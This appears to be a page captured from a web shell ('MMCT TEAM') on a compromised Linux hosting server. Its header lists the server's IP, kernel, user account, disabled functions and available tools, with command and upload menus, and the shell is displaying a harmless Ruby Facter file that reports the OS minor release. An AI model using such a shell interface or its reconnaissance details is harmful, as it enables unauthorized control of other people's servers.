MMCT TEAM
Server IP : 111.118.215.189  /  Your IP : 3.15.11.133
Web Server : Apache
System : Linux md-in-83.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : a1673wkz ( 2475)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/share/ruby/vendor_ruby/facter/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //usr/share/ruby/vendor_ruby/facter/lsbminordistrelease.rb
# Fact: lsbminordistrelease
#
# Purpose: Returns the minor version of the operation system version as gleaned
# from the lsbdistrelease fact.
#
# Resolution:
#   Parses the lsbdistrelease fact for x.y and returns y. If y is not present,
#   the fact is not present.
#
#   For both values '1.2.3' and '1.2' of lsbdistrelease, lsbminordistrelease
#   would return '2'. For the value '1', no fact would be set for
#   lsbminordistrelease.
#
require 'facter'

Facter.add('lsbminordistrelease') do
  confine do
    !Facter.value("os")["lsb"].nil?
  end

  setcode { Facter.value("os")["lsb"]["minordistrelease"] }
end

MMCT - 2023